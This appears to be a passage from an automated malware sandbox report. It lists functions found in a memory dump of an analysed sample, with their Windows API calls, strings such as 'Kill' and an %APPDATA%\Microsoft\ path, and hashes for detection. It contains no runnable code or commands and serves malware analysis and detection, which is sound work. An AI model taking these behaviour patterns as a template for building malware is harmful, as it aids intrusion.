                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
                                                                                                                                          • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
                                                                                                                                          • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
                                                                                                                                          • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
                                                                                                                                          • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
                                                                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,0045B446,?), ref: 00457D3D
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,0045B446,?,00000000,?,00000000,?,?), ref: 00457DB0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2078930461-0
                                                                                                                                        • Opcode ID: 1ed4b861e2bc6ce63922930f61695547228b407cefdc65f64bb4aba5de618ad5
                                                                                                                                        • Instruction ID: a3d642f11d457aa395629e0a14bdd748aea75bd767d9bfa42512cd1f26c023ea
                                                                                                                                        • Opcode Fuzzy Hash: 1ed4b861e2bc6ce63922930f61695547228b407cefdc65f64bb4aba5de618ad5
                                                                                                                                        • Instruction Fuzzy Hash: B111E631684214BFD2311B61EC48F7B3F2CEF45762F100636F945951A2EAA64C5CC7AA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004461E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualProtect.KERNEL32(?,00000004,00000040,?,?,?), ref: 00446217
                                                                                                                                        • VirtualProtect.KERNEL32(?,00000004,?,?,?,?), ref: 00446247
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E240), ref: 00446256
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00446274
                                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00446284
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                                                                                                        • String ID: 8F
                                                                                                                                        • API String ID: 653387826-3652835401
                                                                                                                                        • Opcode ID: 8877ac9362a68fa70872a97d4cf17f9b216ac98fe49bdb02f89d2ef52ebd7194
                                                                                                                                        • Instruction ID: 66e9e1b97d149b9b4bd498972cb58c8b547de34d5bbb60093c39d306fa1c28cf
                                                                                                                                        • Opcode Fuzzy Hash: 8877ac9362a68fa70872a97d4cf17f9b216ac98fe49bdb02f89d2ef52ebd7194
                                                                                                                                        • Instruction Fuzzy Hash: B52139B9600B01EFD720DFA9D98094ABBF8FF09304700466AE655D7710E7B4F904CB5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004599A4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00452AD7: lstrlen.KERNEL32(00000000,00000000,77E2EEF0,77E2EB70,?,?,?,004599BE,253D7325,74B481D0,77E2EEF0,77E2EB70,?,?,00444403,?), ref: 00452B3E
                                                                                                                                          • Part of subcall function 00452AD7: sprintf.NTDLL ref: 00452B5F
                                                                                                                                        • lstrlen.KERNEL32(00000000,253D7325,74B481D0,77E2EEF0,77E2EB70,?,?,00444403,?,03BD8D60), ref: 004599CF
                                                                                                                                        • lstrlen.KERNEL32(?,?,?,00444403,?,03BD8D60), ref: 004599D7
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • strcpy.NTDLL ref: 004599EE
                                                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 004599F9
                                                                                                                                          • Part of subcall function 004636CC: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00459A08,00000000,?,?,?,00444403,?,03BD8D60), ref: 004636E3
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00444403,?,03BD8D60), ref: 00459A16
                                                                                                                                          • Part of subcall function 0044288E: lstrlen.KERNEL32(?), ref: 00442898
                                                                                                                                          • Part of subcall function 0044288E: _snprintf.NTDLL ref: 004428F6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                        • String ID: =
                                                                                                                                        • API String ID: 2864389247-1428090586
                                                                                                                                        • Opcode ID: c280a64315f9f1e414d928e815c02e08de70161d513af5a55a02500376155ee6
                                                                                                                                        • Instruction ID: 0b3d267d05be2fd845f00121378648cea1da1927fb63eba7d83d6cd6d04aa99a
                                                                                                                                        • Opcode Fuzzy Hash: c280a64315f9f1e414d928e815c02e08de70161d513af5a55a02500376155ee6
                                                                                                                                        • Instruction Fuzzy Hash: 46110A339015257B8712B7768C89C6F369CEF45759305401BF905A7203DEBCEC0687AD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044B602, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0044B633
                                                                                                                                        • wcstombs.NTDLL ref: 0044B644
                                                                                                                                          • Part of subcall function 0045ADBF: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,00443227,00000000,00000001,?,?,?,Kill,?,?), ref: 0045ADD1
                                                                                                                                          • Part of subcall function 0045ADBF: StrChrA.SHLWAPI(?,00000020,?,00000000,00443227,00000000,00000001,?,?,?,Kill,?,?), ref: 0045ADE0
                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 0044B665
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0044B674
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0044B67B
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0044B68A
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000), ref: 0044B69A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 417118235-0
                                                                                                                                        • Opcode ID: c29dd838360e182631a58eb97cd3231101a996b389bfa731d39ad41632a27183
                                                                                                                                        • Instruction ID: 466aa55aca234187d35dd60b67f6ba136e9271d4d5ad85a74f46a581031c5868
                                                                                                                                        • Opcode Fuzzy Hash: c29dd838360e182631a58eb97cd3231101a996b389bfa731d39ad41632a27183
                                                                                                                                        • Instruction Fuzzy Hash: 7411C131500615BBEB215F54DC48B9B7BA9FB04701F014125F905A62A0EBF5ED68CBEE
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00447913, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,00466A4C,74B05520,0045D37E,?,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 0044791D
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • lstrcpy.KERNEL32(00000000,?), ref: 00447941
                                                                                                                                        • StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 00447948
                                                                                                                                        • lstrcpy.KERNEL32(00000000,4C003436), ref: 00447990
                                                                                                                                        • lstrcat.KERNEL32(00000000,00000001), ref: 0044799F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                                                                                                                                        • String ID: 7gF
                                                                                                                                        • API String ID: 2616531654-1801860034
                                                                                                                                        • Opcode ID: 7049a35f2737cff6a2e8dd43c916b7eaea89f3746e43a1a7c5bec4fa6cfa469b
                                                                                                                                        • Instruction ID: c7675cbaa8cde70bd4aa09e9ff39f5f3081c03af022bbd8074e9b962901689f5
                                                                                                                                        • Opcode Fuzzy Hash: 7049a35f2737cff6a2e8dd43c916b7eaea89f3746e43a1a7c5bec4fa6cfa469b
                                                                                                                                        • Instruction Fuzzy Hash: 581194B62052065BF3208B65DC88E2BB7E8AB85701F05052DF549D3250EB68984AC72A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00447B3D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
                                                                                                                                          • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
                                                                                                                                          • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
                                                                                                                                          • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
                                                                                                                                          • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
                                                                                                                                        • lstrcpy.KERNEL32(-000000FC,00000000), ref: 00447B77
                                                                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 00447B89
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00447B94
                                                                                                                                        • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 00447BA0
                                                                                                                                        • lstrcpy.KERNEL32(00000000), ref: 00447BBA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                                                                                                                        • String ID: \Low
                                                                                                                                        • API String ID: 1629304206-4112222293
                                                                                                                                        • Opcode ID: 818e5461c576f386a7fa89f769f7aab14150969e892c9880f9cf2c31fa9a96cf
                                                                                                                                        • Instruction ID: e1c809b42e2b3b3fda77b5ac1852ec3a5f343b8cca5eb87cd7658482b908f026
                                                                                                                                        • Opcode Fuzzy Hash: 818e5461c576f386a7fa89f769f7aab14150969e892c9880f9cf2c31fa9a96cf
                                                                                                                                        • Instruction Fuzzy Hash: 8E01D2317056656BE2206B769C08F6B7B8CDF06759B01053AF501D7250EBACED02C6BE
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00450C0C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004536DA: lstrlen.KERNEL32(?,00000000,?,00000000,00464D5C,?,004683E7,00000000,?,?,0045476E,004683E7,?,?,004683E7), ref: 004536E6
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00450C35
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 00450C48
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E268), ref: 00450C59
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E268), ref: 00450C6E
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00450CA6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                                                                                                                        • String ID: `F
                                                                                                                                        • API String ID: 2349942465-3520748611
                                                                                                                                        • Opcode ID: a79c0a36a36d02f08210e9476ef1bb72f5484beb60817c737cc23780708b680a
                                                                                                                                        • Instruction ID: 97a7b159def6c013cc3a1709f9d2a2a50fdaf39a481a9a278e33f1b33ea093af
                                                                                                                                        • Opcode Fuzzy Hash: a79c0a36a36d02f08210e9476ef1bb72f5484beb60817c737cc23780708b680a
                                                                                                                                        • Instruction Fuzzy Hash: BD112979605310AFC3255F15DC44C2777ADEB463227054A7FF80693251EA755C09CBAF
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00461863, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 0046187A
                                                                                                                                          • Part of subcall function 0044966C: wcstombs.NTDLL ref: 0044972A
                                                                                                                                        • lstrlen.KERNEL32(?,?,?,?,?,00449FB2,?,?), ref: 0046189D
                                                                                                                                        • lstrlen.KERNEL32(?,?,?,?,00449FB2,?,?), ref: 004618A7
                                                                                                                                        • memcpy.NTDLL(?,?,00004000,?,?,00449FB2,?,?), ref: 004618B8
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00449FB2,?,?), ref: 004618DA
                                                                                                                                        Strings
                                                                                                                                        • Access-Control-Allow-Origin:, xrefs: 00461868
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heaplstrlen$AllocateFreememcpywcstombs
                                                                                                                                        • String ID: Access-Control-Allow-Origin:
                                                                                                                                        • API String ID: 1256246205-3194369251
                                                                                                                                        • Opcode ID: f7f05e572b2127920be6b394539225847976b97a709b9957e693bd34e194c9fb
                                                                                                                                        • Instruction ID: d06eeb2d9b806bcabfadc3f4d34a041ba53b0c2ef47f7cf4e5aa86f4a90c3167
                                                                                                                                        • Opcode Fuzzy Hash: f7f05e572b2127920be6b394539225847976b97a709b9957e693bd34e194c9fb
                                                                                                                                        • Instruction Fuzzy Hash: D511A175A00204FFCB11AF56DC84F5EBBB9EB85350F24403AF909A3260E7759D04EB2A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00442340, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(0046E240), ref: 00442364
                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(0046E220), ref: 0044237A
                                                                                                                                        • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0044238B
                                                                                                                                        • GetModuleHandleA.KERNEL32(0046F01D), ref: 004423B8
                                                                                                                                          • Part of subcall function 00450B1C: GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,77E49EB0,00000000,?,?,?,?,00000000,004423A2), ref: 00450B2D
                                                                                                                                          • Part of subcall function 00450B1C: LoadLibraryA.KERNEL32(NTDSAPI.DLL), ref: 00450BC7
                                                                                                                                          • Part of subcall function 00450B1C: FreeLibrary.KERNEL32(00000000), ref: 00450BD2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                                                                                                                        • String ID: 8F$8F
                                                                                                                                        • API String ID: 1711133254-1100261700
                                                                                                                                        • Opcode ID: 39b091877d72955bd6b1893d2d23684daeef912f13d8009c3a17528d28ab20de
                                                                                                                                        • Instruction ID: 11b8e3d2aaae10b16d8de8c42f0bd4232c032dbac300007eb28b067d045748a4
                                                                                                                                        • Opcode Fuzzy Hash: 39b091877d72955bd6b1893d2d23684daeef912f13d8009c3a17528d28ab20de
                                                                                                                                        • Instruction Fuzzy Hash: 5C01A978A002108BE7109F7BAC85A053FE9B345314B00497FE609C72A0FBF848498F5F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045AF73, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00449C8C: lstrlen.KERNEL32(?,00000008,00000000,?,74B05520,00458DBF,?,?,00000000,004414AA,?,00000000,?,00464A70,?,00000001), ref: 00449C9B
                                                                                                                                          • Part of subcall function 00449C8C: mbstowcs.NTDLL ref: 00449CB7
                                                                                                                                        • lstrlenW.KERNEL32(00000000,00000000,00000000,%APPDATA%\Microsoft\,?), ref: 0045AF98
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0045AFAA
                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0045AFC7
                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 0045AFD3
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 0045AFE7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                                                                                                                                        • String ID: %APPDATA%\Microsoft\
                                                                                                                                        • API String ID: 3403466626-2699254172
                                                                                                                                        • Opcode ID: aacd6f945d1ef774c5622563892041169b9244786da1d6fb91a10ff6c17530e6
                                                                                                                                        • Instruction ID: 1714179d75e2a2bdd1566cea17a45406d9dc785639bc1c68c64ff4140945eb68
                                                                                                                                        • Opcode Fuzzy Hash: aacd6f945d1ef774c5622563892041169b9244786da1d6fb91a10ff6c17530e6
                                                                                                                                        • Instruction Fuzzy Hash: AF01BC72600208BFE7019B94DC44F9A77ACEF45315F010026F90197261EBF49D08CBAE
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004421BA, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(00001000,.dll,00000000,00000000,00462CFE,00000000,.dll,00000000,00001000,00000000,00000000,?), ref: 004421C8
                                                                                                                                        • lstrlen.KERNEL32(DllRegisterServer), ref: 004421D6
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 004421EB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$AllocateHeap
                                                                                                                                        • String ID: .dll$DllRegisterServer$_iF
                                                                                                                                        • API String ID: 3070124600-441603667
                                                                                                                                        • Opcode ID: a9fd7f3daca5818aba0a0f86d70025706f52375345f9f27ba7e760a6df272468
                                                                                                                                        • Instruction ID: c0b216fb06f6c1f6d4e9e3d761aa17db8c639010fc55c899df3386ed15ff2d51
                                                                                                                                        • Opcode Fuzzy Hash: a9fd7f3daca5818aba0a0f86d70025706f52375345f9f27ba7e760a6df272468
                                                                                                                                        • Instruction Fuzzy Hash: 4BF0E973A01220ABD32057D9DC48D57B7ACEB447517050976F909E3221E6F09C5487AD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045DF9C, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 108stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045383E: lstrlen.KERNEL32(74B05520,00000008,?,00000000,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000,?,?,0045F5E5), ref: 0045384A
                                                                                                                                          • Part of subcall function 0045383E: memcpy.NTDLL(00000000,74B05520,74B05520,74B05520,00000001,00000001,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000), ref: 004538A8
                                                                                                                                          • Part of subcall function 0045383E: lstrcpy.KERNEL32(00000000,00000000), ref: 004538B8
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 0045DFEB
                                                                                                                                        • wsprintfA.USER32 ref: 0045E01B
                                                                                                                                        • GetLastError.KERNEL32 ref: 0045E090
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
                                                                                                                                        • String ID: Content-Type: application/octet-stream$SmF$`
                                                                                                                                        • API String ID: 324226357-537911964
                                                                                                                                        • Opcode ID: 8a079deabfd0f9a88d93af00331efe6df3f7cac3832fd535f7c076f5e335245d
                                                                                                                                        • Instruction ID: 222bf44c82b7e2e1f950fe9f34a56606932eb15af525907f1eb6b0a64ccc3d23
                                                                                                                                        • Opcode Fuzzy Hash: 8a079deabfd0f9a88d93af00331efe6df3f7cac3832fd535f7c076f5e335245d
                                                                                                                                        • Instruction Fuzzy Hash: E931F571500209ABEB21EF23DD44E9B37A8FF40315F10442AFD4597292EBB8EA18CB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044AA04, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0044AA1E
                                                                                                                                        • CreateWaitableTimerA.KERNEL32(0046E0F8,?,?), ref: 0044AA3B
                                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 0044AA4C
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
                                                                                                                                          • Part of subcall function 00451370: RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
                                                                                                                                          • Part of subcall function 00451370: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 0044AA8C
                                                                                                                                        • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 0044AAAB
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 0044AAC1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1835239314-0
                                                                                                                                        • Opcode ID: 9acc2d9d2f6ff99ce4ad10d9a77e9e6a115e55e6040e5d3d278c9f915fdc75f6
                                                                                                                                        • Instruction ID: 1f7389019de52129afff5c61e5f1eadf794e344cb0b4ca228811ff5b56ec96b3
                                                                                                                                        • Opcode Fuzzy Hash: 9acc2d9d2f6ff99ce4ad10d9a77e9e6a115e55e6040e5d3d278c9f915fdc75f6
                                                                                                                                        • Instruction Fuzzy Hash: 04316F71940109EBDF20DF95CE89CAFBBB9EB95340B148016F505B2211E7789E54CB6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045717A, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,00000102,?,?,?,00000000,00000000), ref: 004571B9
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 004571CA
                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 004571E5
                                                                                                                                        • GetLastError.KERNEL32 ref: 004571FB
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0045720D
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00457222
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1822509305-0
                                                                                                                                        • Opcode ID: b258e1666e7ff000740fd5c26d6a7bd95d7c131d90e52e5e0ee30ea5cf23e29c
                                                                                                                                        • Instruction ID: 445c49b4bedd9644f3062b9285cc96694bc7c47afe26700d79ee18211a61539e
                                                                                                                                        • Opcode Fuzzy Hash: b258e1666e7ff000740fd5c26d6a7bd95d7c131d90e52e5e0ee30ea5cf23e29c
                                                                                                                                        • Instruction Fuzzy Hash: 7B118C36901018BBCB225B92EC08CEF7F7EEB453A1F000876F905A1162DA754D59EBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004489F5, Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 00448A1D
                                                                                                                                        • _strupr.NTDLL ref: 00448A58
                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00448A60
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00448AA0
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 00448AA7
                                                                                                                                        • GetLastError.KERNEL32 ref: 00448AAF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 110452925-0
                                                                                                                                        • Opcode ID: b6b9e62d11b390f04b6761aacc0e877a71de3e8689b7f6b84de6343495028633
                                                                                                                                        • Instruction ID: b503e04d2dfcf3b6d5795304b9a33fdcee21b9f73f535006e917f9020b049438
                                                                                                                                        • Opcode Fuzzy Hash: b6b9e62d11b390f04b6761aacc0e877a71de3e8689b7f6b84de6343495028633
